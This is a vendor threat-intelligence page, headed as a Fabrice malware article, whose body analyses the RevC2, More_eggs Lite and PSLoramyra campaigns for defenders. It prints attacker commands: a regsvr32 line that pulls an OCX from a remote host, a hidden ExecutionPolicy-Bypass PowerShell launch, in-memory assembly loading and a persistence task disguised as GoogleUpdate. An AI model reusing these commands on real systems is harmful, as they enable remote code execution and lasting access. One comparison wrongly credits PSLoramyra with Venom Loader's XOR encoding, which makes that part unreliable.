company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Supply Chain

Typosquatting

loading..
loading..
loading..

Fabrice Malware: Python Typosquatting Targeting AWS via Supply Chain on Linux & Windows

Explore Fabrice malware: a Python typosquatting supply chain attack targeting AWS credentials across Linux & Windows via the compromised fabric library...

11-Nov-2024
13 min read

Related Articles

loading..

Fileless Malware

MaaS

Explore detailed analysis of advanced fileless malware RevC2, More_eggs Lite, an...

Advanced malware campaigns continue to adapt and employ sophisticated techniques to infiltrate, persist, and exploit targeted systems. This technical [Threatfeed](https://www.secureblink.com/cyber-security-news) presents an exhaustive analysis of three notable malware campaigns: **RevC2**, **More_eggs Lite**, and **PSLoramyra**. Each of these campaigns exemplifies distinct methodologies for evading detection, establishing persistence, and executing malicious payloads. By dissecting their infection chains, execution mechanisms, communication protocols, and persistence strategies, this analysis aims to provide a comprehensive understanding of their operational nuances and offer actionable insights for detection and mitigation. --- ## **Overview of Malware Campaigns** ### **Campaign 1: API Documentation Lure Leading to RevC2** **Duration:** August to September **Overview:** This campaign employs an API documentation lure delivered via obfuscated LNK files (VenomLNK) to execute a malicious payload known as **RevC2**. RevC2 is a backdoor with capabilities to steal sensitive data and maintain persistent access. ### **Campaign 2: Cryptocurrency Transaction Lure Leading to Venom Loader and More_eggs Lite** **Duration:** September to October **Overview:** Leveraging the allure of cryptocurrency transactions, this campaign delivers the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor providing remote code execution (RCE) capabilities. ### **Campaign 3: PSLoramyra Fileless Malware Loader** **Overview:** **PSLoramyra** is a sophisticated fileless malware loader that utilizes PowerShell, VBS, and BAT scripts to inject malicious payloads directly into memory, thereby evading traditional detection mechanisms. It establishes persistent access through Windows Task Scheduler and employs advanced obfuscation and process injection techniques. --- ## **Detailed Technical Analysis** ### **3.1. Campaign 1: RevC2** #### **3.1.1. Attack Chain Overview** The attack chain for Campaign 1 is a multi-stage process designed to deliver and execute the RevC2 backdoor seamlessly: 1. **Distribution Method:** The initial vector is an obfuscated LNK file named **VenomLNK**. 2. **Payload Delivery:** VenomLNK contains an obfuscated BAT script that downloads an API documentation PNG image from a specified URL. 3. **Execution Flow:** The BAT script registers an ActiveX control via `regsvr32` to initiate the RevC2 payload. #### **3.1.2. First Stage: VenomLNK** - **Obfuscation Techniques:** - **LNK File Usage:** The use of LNK files (VenomLNK) is a strategic choice to bypass basic security measures and obfuscate the malicious intent from users and automated detection systems. - **Obfuscated BAT Script:** Embedding an obfuscated BAT script within the LNK file serves to hide the true nature of the payload and its execution sequence. - **API Documentation Lure:** - **Legitimacy Exploitation:** By using an API documentation image as a lure, the attackers exploit the trust users place in legitimate documentation resources, increasing the likelihood of user interaction and execution. - **Command Execution:** - **ActiveX Control Registration:** ```shell wmic process call create "regsvr32 /s /i \\gdrive.rest@8080\api\AdvancedWin.ocx" ``` - **Purpose:** This command registers the ActiveX control silently (`/s`) and passes parameters (`/i`), thereby triggering the execution of the RevC2 payload without user awareness. #### **3.1.3. Second Stage: RevC2 Backdoor** - **Binary Analysis:** - **PDB Path Indication:** The presence of `Rev.pdb` in the binary path (`C:\Users\PC\Desktop\C2New\Rev\x64\Release\Rev.pdb`) may unintentionally reveal development or debugging information, potentially aiding forensic analysts in understanding the malware's structure. - **Execution Conditions:** - **Command-Line Argument Checks:** - Verifies if the first argument ends with `dWin.ocx`. - Ensures the executable path matches `regsvr32.exe`. - **Purpose:** These conditional checks ensure that RevC2 only executes within the intended attack chain, thereby evading execution in analysis environments like sandboxes. - **Persistence and Logging:** - **Log File Creation:** - **Path:** `C:\ProgramData\boot_%YYYYMMDDTHHMMSS%.log` - **Content:** Stores internal messages with timestamps, providing operational transparency while minimizing immediate detection through anomalous behavior. #### **3.1.4. Communication Protocol** - **WebSockets Usage:** - **Library:** Utilizes the C++ library `websocketpp` for establishing WebSocket connections. - **C2 Address:** Hardcoded in the binary (e.g., `ws://208.85.17.52:8082`). - **Data Format:** JSON objects facilitate structured and easily parsable communication between the victim's machine and the C2 server. - **JSON Communication:** - **Victim to C2:** ```json { "%output_name%": "%output_value%", "type": "%command_ID%" } ``` - **C2 to Victim:** ```json { "type": "%command_ID%", "command": "%command_parameter%" } ``` - **Dynamic Command IDs:** The `command_ID` sent by RevC2 may differ from the one sent by the C2 server, enhancing command obfuscation and reducing predictability. #### **3.1.5. Command Functionality** RevC2 supports a range of commands, each identified by a unique `command_ID`: | **Action** | **command_ID** | **command_parameter** | **Description** | |------------------------------------|-----------------|--------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------| | Steals passwords | `000000` | Empty | Extracts saved passwords from Chromium browsers and sends them to the C2 server. Logs the action with a timestamped message. | | Executes shell commands | `0001` | `%command%` | Executes arbitrary shell commands using `cmd /c`, captures the output via a pipe, and sends the results to the C2 server. | | Takes screenshots | `0002` | `%multiplier%` | Captures screenshots with resolution scaled by the multiplier value, encodes them in base64, and sends them to the C2 server. Logs the action. | | Proxies traffic | `0003` | `{"listenerIP": "%ip%", "listenerPort" : "%port%"}` | Sets up a SOCKS5 proxy by connecting to a target address and relaying data between the victim and the proxy server. Uses internal command IDs `0x55` and `0x70`. | | Steals cookies | `0009` | Empty | Extracts cookies from Chromium browsers and sends them to the C2 server. Logs detailed information about the stolen cookies. | | Executes a command as a different user | `0012` | `{"username": "%username%", "password": "%password%", "command": "%commandline%"}` | Executes specified commands under different user credentials without sending the output to the C2 server. | #### **3.1.6. Detection and Mitigation Strategies** - **Behavioral Analysis:** - **Regsvr32 Monitoring:** Track executions of `regsvr32` with unusual network paths or parameters. - **Process Validation:** Monitor processes for unexpected injections into `regsvr32.exe`. - **Network Monitoring:** - **WebSocket Traffic Analysis:** Scrutinize WebSocket connections to known malicious C2 servers (e.g., `ws://208.85.17.52:8082`). - **JSON Payload Inspection:** Analyze the structure and content of JSON communications for suspicious patterns. - **Endpoint Protection:** - **Advanced Endpoint Detection and Response (EDR):** Deploy EDR solutions capable of identifying behaviors specific to RevC2, such as conditional execution checks and specific command patterns. - **Credential Security:** - **Browser Security Enhancements:** Implement browser security measures to protect stored credentials. - **Credential Managers:** Use credential managers that encrypt stored passwords to mitigate the risk of theft. - **Further Investigation:** - **Distribution Mechanism Analysis:** Investigate how VenomLNK files are disseminated (e.g., phishing, malicious downloads). - **C2 Infrastructure Mapping:** Identify and disrupt the C2 server infrastructure. - **Payload Variability Assessment:** Analyze variations in URLs and filenames across samples to understand the malware's adaptability. --- ### **3.2. Campaign 2: More_eggs Lite via Venom Loader** #### **3.2.1. Attack Chain Overview** Campaign 2 employs a cryptocurrency transaction lure to deliver the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor offering RCE capabilities. The attack chain comprises multiple stages to ensure stealth, persistence, and effective payload execution. #### **3.2.2. First Stage: VenomLNK** - **Obfuscation Techniques:** - **LNK File Usage:** Similar to Campaign 1, VenomLNK files contain obfuscated BAT scripts to evade detection. - **Multi-Script Execution:** The LNK file orchestrates the execution of VBS and BAT scripts to complicate analysis and hinder straightforward detection. - **Cryptocurrency Transaction Lure:** - **Exploiting User Interest:** Leveraging the popularity and financial incentive associated with cryptocurrency transactions increases the likelihood of user interaction and engagement with the malicious content. - **Script Execution Flow:** 1. **VBS and BAT Script Generation:** The initial BAT script writes `run_bat.vbs` and `bat2.bat` to the Windows temporary directory. 2. **Script Execution:** Executes `run_bat.vbs`, which in turn runs `bat2.bat`. 3. **Payload Download:** `bat2.bat` downloads an image of a cryptocurrency transaction as a lure and displays it to the victim. 4. **Malicious Payload Download:** Concurrently, downloads `base.zip` containing `ApplicationFrameHost.exe` from a designated URL. #### **3.2.3. Second Stage: Venom Loader** - **Customization Per Victim:** - **Dynamic DLL Generation:** Venom Loader DLLs are custom-built for each victim, complicating the creation of universal detection signatures and impeding automated analysis. - **Encoding Mechanism:** - **XOR Encoding with Environment Variables:** Uses the `%computername%` environment variable as an XOR key to encode subsequent payload stages, introducing system-specific variability that challenges detection and analysis. - **Persistence Mechanism:** - **Task Scheduler Integration:** Creates a scheduled task to ensure continuous execution and persistence across system reboots. - **Execution Flow:** 1. **Sideloading Malicious DLL:** - Unzips `base.zip` containing `ApplicationFrameHost.exe`. - Executes `ApplicationFrameHost.exe`, which sideloads `dxgi.dll`, leading to Venom Loader execution. 2. **Payload Handling:** - **More_eggs Lite Delivery:** Venom Loader decodes and executes the More_eggs Lite backdoor by writing split, encoded chunks to disk and reconstructing them via a PowerShell script. #### **3.2.4. Third Stage: More_eggs Lite Backdoor** - **Functionality:** - **Remote Code Execution (RCE):** Enables attackers to execute arbitrary commands on the infected system. - **HTTP POST Communication:** Continuously sends POST requests to the C2 server for command reception and output exfiltration. - **Communication Protocol:** - **POST Request Structure:** - **URL:** `<c2_address>/api/infos` - **POST Data:** ```plaintext name=^%computername%&ret= ``` - **Command Response:** - JSON response containing `{"command": %command_encoded%}`, which is XOR’ed with `%computername%` and executed as a `.cmd` file. #### **3.2.5. Communication Protocol** - **C2 Communication:** - **HTTP Protocol:** Utilizes standard HTTP POST requests, which can blend with legitimate traffic, complicating detection. - **Command Encoding:** Commands are XOR-encoded using `%computername%`, adding an obfuscation layer that requires decoding for analysis. #### **3.2.6. Detection and Mitigation Strategies** - **Script Monitoring:** - **VBS and BAT Script Detection:** Monitor the creation and execution of `run_bat.vbs` and `bat2.bat` scripts, especially those interacting with temporary directories. - **Registry Monitoring:** - **Task Scheduler Auditing:** Detect unauthorized additions to the Task Scheduler, particularly tasks masquerading as legitimate services like `GoogleUpdate`. - **Network Traffic Analysis:** - **Anomalous HTTP POST Requests:** Identify and analyze unusual POST requests to endpoints like `/api/infos`, especially those with encoded command data. - **Endpoint Protection:** - **Behavioral Detection:** Deploy EDR solutions capable of identifying the behaviors associated with Venom Loader and More_eggs Lite, such as environment variable-based encoding and in-memory execution. - **Further Investigation:** - **Encoding Technique Analysis:** Examine the XOR encoding mechanism and its reliance on environment variables for potential detection patterns. - **C2 Server Infrastructure:** Investigate the infrastructure behind the C2 servers to disrupt command and control capabilities. - **Persistence Mechanism Robustness:** Assess the resilience of the Task Scheduler-based persistence against common security measures and removal techniques. --- ### **3.3. Campaign 3: PSLoramyra Fileless Malware Loader** #### **3.3.1. Infection Chain and Execution Flow** **PSLoramyra** is an advanced **fileless malware loader** that leverages PowerShell, VBS, and BAT scripts to inject and execute malicious payloads directly in memory, thereby evading traditional detection methods. The infection chain comprises several meticulously orchestrated stages to ensure stealth, persistence, and effective payload execution. **Infection Chain Stages:** 1. **Initial PowerShell Script Execution:** - Contains the main malicious payload and scripts required for further execution. - Generates essential files: `roox.ps1`, `roox.bat`, and `roox.vbs`. - Initiates the execution chain by running `roox.vbs`. 2. **Execution Chain:** - **roox.vbs:** Launches `roox.bat` in a hidden window. - **roox.bat:** Executes `roox.ps1` with stealth-enhancing PowerShell flags. - **roox.ps1:** Deobfuscates and loads the main malicious payload directly into memory using `.NET Reflection` and injects it into a legitimate process (`RegSvcs.exe`). 3. **Payload Execution:** - **Quasar RAT:** Loaded into memory, providing remote access capabilities to the threat actor. 4. **Establishing Persistence:** - Utilizes Windows Task Scheduler to create a task that runs `roox.vbs` every two minutes, ensuring continuous execution. #### **3.3.2. Detailed Script Breakdown** ##### **3.3.2.1. roox.vbs Script** - **Functionality:** Acts as a bridge between the Task Scheduler and the subsequent scripts, ensuring the infection chain progresses seamlessly. - **Key Components:** - **Error Handling:** - `On Error Resume Next`: Suppresses error messages to maintain stealth during execution failures. - **CreateWshShellObj Function:** - Creates a `WScript.Shell` COM object to execute commands and scripts. - **GetFilePath Function:** - Retrieves the absolute path to `roox.bat`. - **GetVisibilitySetting Function:** - Configures the execution to run in a hidden window (`0`), preventing user awareness. - **RunFile Function:** - Executes `roox.bat` using the hidden window settings to maintain stealth. - **Execution Sequence:** 1. Creates the `WScript.Shell` object. 2. Retrieves the path to `roox.bat`. 3. Sets the window style to hidden. 4. Executes `roox.bat` in hidden mode. ##### **3.3.2.2. roox.bat Script** - **Functionality:** Executes the PowerShell script `roox.ps1` with specific flags to enhance stealth and bypass security measures. - **Key Commands:** ```bat powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\roox.ps1" ``` - **Flags Explained:** - `-NoProfile`: Prevents the loading of user-specific PowerShell profiles. - `-WindowStyle Hidden`: Conceals the PowerShell window during execution. - `-ExecutionPolicy Bypass`: Overrides PowerShell's execution policies to allow unrestricted script execution. ##### **3.3.2.3. roox.ps1 Script** - **Functionality:** Deobfuscates the main malicious payload, dynamically loads it into memory, and executes it using `.NET Reflection` and `RegSvcs.exe`. - **Key Components:** - **Obfuscated Payload Storage:** - **Variables:** - `$RoXstring_lla`: Stores part of the malicious payload as a HEX string with `%&%` delimiters. - `$Mordexstring_ojj`: Stores the remaining payload similarly. - **Deobfuscation Process:** ```powershell [Byte[]] $NKbb = $Mordexstring_ojj -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) } [Byte[]] $pe = $RoXstring_lla -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) } ``` - **Steps:** 1. **Splitting HEX Strings:** Divides the HEX strings into individual byte segments using `%&%` as a delimiter. 2. **Conversion to Bytes:** Converts each HEX segment into its corresponding byte value, forming byte arrays. - **Obfuscation Cleaning:** - **Removing `#` Symbols:** ```powershell $cleanedString = $obfuscatedString -replace '#', '' ``` - Transforms strings like `L####o####a####d` into `Load` to restore method names. - **Assembly Loading and Payload Execution:** ```powershell [Reflection.Assembly]::Load($binaryPayload) ``` - **Steps:** 1. **Load .NET Assembly:** Uses `Reflection.Assembly.Load` to inject the malicious assembly into memory. 2. **Process Injection:** Targets `RegSvcs.exe` to host the malicious payload, blending it with legitimate system processes. 3. **Quasar RAT Execution:** Executes the `Quasar RAT` within the injected process, providing remote access capabilities. #### **3.3.3. Payload Execution and Memory Injection** - **Reflection.Assembly.Load:** - **Purpose:** Dynamically loads the malicious .NET assembly into the memory space of a legitimate system process (`RegSvcs.exe`), avoiding disk-based traces. - **Process Injection via RegSvcs.exe:** - **Methodology:** Injects the Quasar RAT into `RegSvcs.exe`, a legitimate Windows process, to conceal malicious activity within normal system operations. #### **3.3.4. Persistence Mechanism** - **Windows Task Scheduler Integration:** - **Task Creation Steps:** 1. **Scheduler Object Initialization:** ```powershell New-Object -ComObject Schedule.Service $scheduler.Connect() ``` 2. **Task Definition:** ```powershell $taskDefinition = $scheduler.NewTask(0) $taskDefinition.Settings.Enabled = $true ``` 3. **Trigger Configuration:** ```powershell $trigger.Repetition.Interval = “PT2M” ``` - **Frequency:** Every two minutes to ensure continuous execution. 4. **Action Configuration:** ```powershell $action.Path = “C:\Users\Public\roox.vbs” ``` 5. **Task Registration:** ```powershell $taskFolder.RegisterTaskDefinition() ``` - **Task Naming:** Registered under the name `GoogleUpdate` to mimic a legitimate service, reducing suspicion. - **Purpose:** Ensures that `roox.vbs` is executed at regular intervals, maintaining persistent malware presence even after system reboots or manual termination attempts. #### **3.3.5. Evasion Techniques** **PSLoramyra** employs a suite of sophisticated evasion strategies to bypass detection: - **Fileless Execution:** - **Memory-Based Payloads:** Injects malicious code directly into memory without writing persistent files to disk, evading traditional signature-based detection methods. - **Obfuscation:** - **HEX Encoding with Delimiters:** Uses HEX strings separated by `%&%` to obfuscate the payload, complicating static analysis and signature generation. - **Symbol Removal:** Removes `#` symbols to clean obfuscated method names, further hindering analysis efforts. - **Stealthy Process Injection:** - **Legitimate Process Targeting:** Injects payloads into `RegSvcs.exe`, a legitimate Windows process, masking malicious activity within normal system operations. - **Hidden Execution:** - **Invisible Script Execution:** Runs scripts in hidden windows, preventing user awareness and reducing the likelihood of manual detection. - **Persistence via Legitimate Services:** - **Task Naming Mimicry:** Registers scheduled tasks under names like `GoogleUpdate`, leveraging the trust associated with legitimate services to avoid raising alarms. #### **3.3.6. Indicators of Compromise (IOCs)** **Hashes:** - `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` - `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` - `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` - `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` **Files:** - `C:\Users\Public\roox.vbs` - `C:\Users\Public\roox.bat` - `C:\Users\Public\roox.ps1` **Domains:** - `Ronymahmoud.casacam.net` **IP Addresses:** - `3.145.156.44` #### **3.3.7. Detection and Mitigation Strategies** Given PSLoramyra's sophisticated evasion techniques, a multi-layered approach to detection and mitigation is essential: - **Behavioral Analysis:** - **Script Execution Monitoring:** Detect the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1`. - **Process Injection Detection:** Monitor for unusual injections into legitimate processes like `RegSvcs.exe`. - **Task Scheduler Auditing:** Scrutinize scheduled tasks with suspicious names or high-frequency triggers. - **Network Traffic Monitoring:** - **C2 Communication Detection:** Identify and block communications with known malicious domains (`Ronymahmoud.casacam.net`) and IP addresses (`3.145.156.44`). - **Anomalous Traffic Detection:** Use network anomaly detection to spot unusual outbound connections or data exfiltration attempts. - **Script and File Monitoring:** - **File System Monitoring:** Detect the creation of files in public directories such as `C:\Users\Public\`. - **Script Content Analysis:** Utilize script scanning tools to analyze the contents of PowerShell, VBS, and BAT scripts for obfuscation patterns and suspicious commands. - **Endpoint Protection:** - **Advanced EDR Solutions:** Deploy EDR tools capable of detecting in-memory execution and process injection techniques. - **Anti-Malware Updates:** Ensure antivirus and anti-malware solutions are updated with the latest threat definitions and heuristic detection capabilities. - **User Education and Awareness:** - **Phishing Prevention Training:** Educate users about the risks of executing unsolicited scripts and the importance of verifying the legitimacy of downloaded files. - **Security Best Practices:** Encourage the principle of least privilege, limiting user permissions to reduce the impact of potential infections. --- ## **Cross-Campaign Insights and Comparative Analysis** ### **4.1. Common Techniques and Strategies** Despite targeting different vectors and employing distinct payloads, the analyzed campaigns share several common methodologies: - **Use of Obfuscated Scripts:** - **RevC2 and PSLoramyra:** Both campaigns utilize obfuscated BAT, VBS, and PowerShell scripts to conceal malicious intent and complicate detection. - **Process Injection:** - **RevC2 and PSLoramyra:** Both inject payloads into legitimate system processes (`regsvr32.exe` and `RegSvcs.exe` respectively) to mask malicious activities within normal system operations. - **C2 Communication:** - **RevC2, More_eggs Lite, and PSLoramyra:** All campaigns establish communications with external Command and Control (C2) servers, utilizing protocols like WebSockets and HTTP POST requests to receive commands and exfiltrate data. ### **4.2. Unique Characteristics** While sharing common techniques, each campaign exhibits unique attributes that distinguish it from the others: - **RevC2:** - **API Documentation Lure:** Uses legitimate-looking API documentation as a lure to increase user engagement. - **WebSocket-Based C2:** Employs WebSockets for real-time and persistent communication with the C2 server. - **More_eggs Lite:** - **Cryptocurrency Transaction Lure:** Leverages the financial incentive and popularity of cryptocurrency transactions to entice users. - **JavaScript-Based Backdoor:** Utilizes a JS backdoor for remote code execution, differentiating it from the predominantly PowerShell and BAT script-based execution in other campaigns. - **PSLoramyra:** - **Fileless Execution:** Executes entirely in memory without creating persistent files, enhancing stealth and evasion. - **XOR Encoding with Environment Variables:** Uses system-specific environment variables for encoding payloads, adding an additional layer of obfuscation. ### **4.3. Security Implications** The sophistication and diversity of these campaigns underscore the evolving nature of cyber threats: - **Evasion and Stealth:** Advanced evasion techniques like process injection, obfuscated scripting, and fileless execution make detection challenging, necessitating more sophisticated security measures. - **Data Theft and RCE Capabilities:** The focus on credential theft, cookie extraction, and remote code execution poses significant risks to both individual users and organizational infrastructures, enabling extensive data exfiltration and system compromise. - **Persistence Mechanisms:** Persistent access through Task Scheduler and regular script executions ensures long-term control over compromised systems, making remediation efforts more complex. --- ## **Comprehensive Indicators of Compromise (IOCs)** ### **5.1. Hashes** | **Hash Type** | **Value** | |---------------|-----------------------------------------------| | SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` | | SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` | | SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` | | SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` | ### **5.2. Files** | **File Path** | **Description** | |----------------------------------|-------------------------------------------------| | `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. | | `C:\Users\Public\roox.bat` | BAT script executing the PowerShell script. | | `C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. | ### **5.3. Domains** | **Domain** | **Description** | |-------------------------------|---------------------------------------------------------| | `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. | ### **5.4. IP Addresses** | **IP Address** | **Description** | |----------------------|-------------------------------------------| | `3.145.156.44` | IP address associated with PSLoramyra C2 server. | --- ## **Unified Detection and Mitigation Strategies** To effectively counter the multifaceted threats posed by RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a comprehensive and unified approach encompassing multiple layers of security. ### **6.1. Behavioral Analysis** - **Script Execution Monitoring:** - **Detection:** Identify the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1` scripts. - **Tools:** Utilize EDR solutions that can track script executions and flag suspicious activities based on behavior rather than signatures. - **Process Injection Detection:** - **Detection:** Monitor for injections into legitimate processes like `regsvr32.exe` and `RegSvcs.exe`. - **Tools:** Advanced EDR tools can analyze process trees and detect anomalies indicative of process injection. - **Task Scheduler Auditing:** - **Detection:** Scrutinize tasks with high-frequency triggers (e.g., every two minutes) or suspicious names (e.g., `GoogleUpdate`). - **Tools:** Implement policies to alert on new or modified scheduled tasks, especially those deviating from normal patterns. ### **6.2. Network Traffic Monitoring** - **C2 Communication Detection:** - **Detection:** Identify and block communications with known malicious domains and IP addresses (e.g., `Ronymahmoud.casacam.net`, `3.145.156.44`). - **Tools:** Utilize network firewalls and intrusion detection systems (IDS) to filter and analyze outbound traffic for connections to malicious C2 servers. - **Anomalous Traffic Detection:** - **Detection:** Spot unusual WebSocket or HTTP POST traffic patterns that deviate from normal network behavior. - **Tools:** Implement anomaly detection systems that leverage machine learning to identify deviations indicative of malware communications. ### **6.3. Script and File Monitoring** - **File System Monitoring:** - **Detection:** Detect the creation of files in public directories (e.g., `C:\Users\Public\`) and monitor for the presence of known malicious scripts. - **Tools:** Deploy file integrity monitoring solutions to track and alert on unauthorized file creations or modifications. - **Script Content Analysis:** - **Detection:** Analyze the content of PowerShell, VBS, and BAT scripts for obfuscation patterns, HEX encoding, and suspicious commands. - **Tools:** Use script scanning tools and sandbox environments to perform dynamic and static analysis of scripts. ### **6.4. Endpoint Protection** - **Advanced Endpoint Detection and Response (EDR):** - **Capabilities:** EDR solutions should be capable of detecting in-memory execution, process injection, and anomalous script behaviors. - **Deployment:** Ensure EDR tools are consistently updated and configured to monitor for behaviors exhibited by RevC2, More_eggs Lite, and PSLoramyra. - **Anti-Malware Solutions:** - **Capabilities:** Ensure antivirus and anti-malware solutions are equipped with heuristic and behavior-based detection capabilities to identify emerging threats. - **Maintenance:** Regularly update malware definitions and perform routine scans to detect and remediate infections. ### **6.5. Persistence Mechanism Auditing** - **Task Scheduler Security:** - **Auditing:** Regularly audit Task Scheduler for unauthorized tasks, particularly those with high-frequency triggers or names mimicking legitimate services. - **Policies:** Implement strict policies governing who can create or modify scheduled tasks within the organization. - **Registry Monitoring:** - **Detection:** Monitor registry keys associated with autorun entries (e.g., `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`) for unauthorized modifications. - **Tools:** Utilize registry monitoring tools to detect and alert on suspicious changes. ### **6.6. User Education and Awareness** - **Phishing Prevention Training:** - **Education:** Train users to recognize and avoid suspicious links, attachments, and downloads that may contain malicious scripts or payloads. - **Awareness Programs:** Implement regular awareness programs to keep users informed about evolving threat vectors and social engineering tactics. - **Security Best Practices:** - **Principle of Least Privilege:** Enforce least privilege access controls to minimize the potential impact of compromised accounts. - **Credential Management:** Promote the use of strong, unique passwords and implement multi-factor authentication (MFA) to protect user accounts. --- ## **Recommendations for Enhanced Security Posture** To fortify defenses against sophisticated malware campaigns like RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a holistic and proactive security strategy encompassing technical defenses, policy enforcement, and continuous monitoring. ### **7.1. Advanced Threat Detection Solutions** - **Deployment of Machine Learning-Based Systems:** - **Capabilities:** Utilize machine learning algorithms to identify and respond to anomalous behaviors indicative of malware activities. - **Benefits:** Enhances the ability to detect novel threats that evade signature-based detection methods. - **Integration with Threat Intelligence:** - **Action:** Incorporate threat intelligence feeds to stay updated on emerging threats, malicious IPs, and domains. - **Benefits:** Facilitates timely detection and blocking of known malicious entities involved in malware campaigns. ### **7.2. Strengthening Script Execution Policies** - **PowerShell Execution Policies:** - **Enforcement:** Restrict PowerShell execution to signed scripts only, preventing the execution of unauthorized or malicious scripts. - **Configuration:** Implement constrained language modes to limit the capabilities of PowerShell scripts, reducing the risk of abuse. - **Script Whitelisting:** - **Action:** Employ script whitelisting to allow only approved scripts to execute within the environment. - **Benefits:** Minimizes the risk of unauthorized script execution and facilitates the identification of rogue scripts. ### **7.3. Regular System Audits and Hardening** - **System File and Registry Audits:** - **Action:** Conduct periodic audits of system files, registry entries, and scheduled tasks to identify and remediate anomalies. - **Tools:** Utilize automated auditing tools to streamline the process and ensure comprehensive coverage. - **Security Hardening Measures:** - **Actions:** - Disable unnecessary services and ports to reduce attack surfaces. - Implement strict access controls and permissions to limit user capabilities. - Regularly apply security patches and updates to address vulnerabilities exploited by malware. ### **7.4. Network Segmentation and Monitoring** - **Network Segmentation:** - **Action:** Divide the network into distinct segments to contain potential breaches and limit lateral movement. - **Benefits:** Enhances overall network security by isolating critical systems and sensitive data. - **Intrusion Detection and Prevention Systems (IDS/IPS):** - **Deployment:** Implement IDS/IPS solutions to monitor and block malicious network traffic in real-time. - **Configuration:** Fine-tune IDS/IPS rules to detect patterns associated with malware communications and command executions. ### **7.5. Threat Intelligence Integration** - **Centralized Threat Intelligence Platforms:** - **Action:** Integrate threat intelligence platforms to aggregate and analyze data from multiple sources. - **Benefits:** Provides a comprehensive view of the threat landscape, enabling informed decision-making and proactive defenses. - **Collaborative Intelligence Sharing:** - **Action:** Participate in information-sharing communities and platforms to exchange threat intelligence with peers and industry groups. - **Benefits:** Enhances collective awareness and resilience against emerging threats. --- ## **Potential Areas for Further Investigation** To comprehensively understand and mitigate the threats posed by RevC2, More_eggs Lite, and PSLoramyra, further investigation is essential in the following areas: ### **8.1. Distribution Mechanisms** - **Initial Infection Vectors:** - **Action:** Investigate how these malware campaigns disseminate their initial LNK files (e.g., phishing emails, malicious downloads, exploit kits). - **Purpose:** Understanding distribution methods is crucial for implementing targeted prevention measures and disrupting the malware's spread. ### **8.2. C2 Infrastructure Analysis** - **Mapping C2 Servers:** - **Action:** Analyze and map out the Command and Control infrastructure utilized by these malware families. - **Tools:** Employ network forensics and threat intelligence tools to identify and locate C2 servers. - **Purpose:** Disrupting C2 communication can hinder malware functionality and limit data exfiltration. ### **8.3. Payload Variants and Evolution** - **Monitoring for New Variants:** - **Action:** Continuously monitor for new variants of RevC2, More_eggs Lite, and PSLoramyra that may introduce additional functionalities or evasion techniques. - **Tools:** Utilize threat intelligence platforms and malware analysis tools to detect and analyze new variants. - **Purpose:** Staying abreast of malware evolution ensures that defenses remain effective against emerging threat vectors. ### **8.4. Threat Actor Profiling** - **Identifying Threat Actors:** - **Action:** Conduct threat intelligence gathering to attribute these malware campaigns to specific threat actors or groups. - **Techniques:** Analyze TTPs (Tactics, Techniques, and Procedures), infrastructure, and operational patterns to profile the threat actors. - **Purpose:** Understanding the motivations and capabilities of threat actors aids in anticipating future tactics and strengthening defenses accordingly. --- ## **Conclusion** The comprehensive analysis of the RevC2, More_eggs Lite, and PSLoramyra malware campaigns reveals a convergence of sophisticated techniques aimed at evading detection, establishing persistent access, and executing malicious payloads effectively. These campaigns employ a blend of obfuscated scripting, process injection, fileless execution, and strategic C2 communications to maintain stealth and operational resilience. **RevC2** leverages API documentation lures and WebSocket-based C2 communication to execute a versatile backdoor capable of credential theft and remote code execution. **More_eggs Lite**, delivered via Venom Loader, utilizes cryptocurrency transaction lures and JavaScript-based backdoors to offer robust RCE capabilities. **PSLoramyra** stands out with its entirely fileless execution model, advanced obfuscation techniques, and persistent Task Scheduler integration, making it particularly challenging to detect and mitigate. To effectively counter these threats, organizations must adopt a layered and proactive security posture that encompasses advanced detection solutions, rigorous monitoring, user education, and continuous threat intelligence integration. By understanding the intricacies of these malware campaigns and implementing comprehensive defense strategies, organizations can enhance their resilience against sophisticated cyber threats. --- ## **Summary of Indicators of Compromise (IOCs)** ### **5.1. Hashes** | **Hash Type** | **Value** | |---------------|-----------------------------------------------| | SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` | | SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` | | SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` | | SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` | ### **5.2. Files** | **File Path** | **Description** | |----------------------------------|-------------------------------------------------| | `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. | | `C:\Users\Public\roox.bat` | BAT script executing the PowerShell script. | | 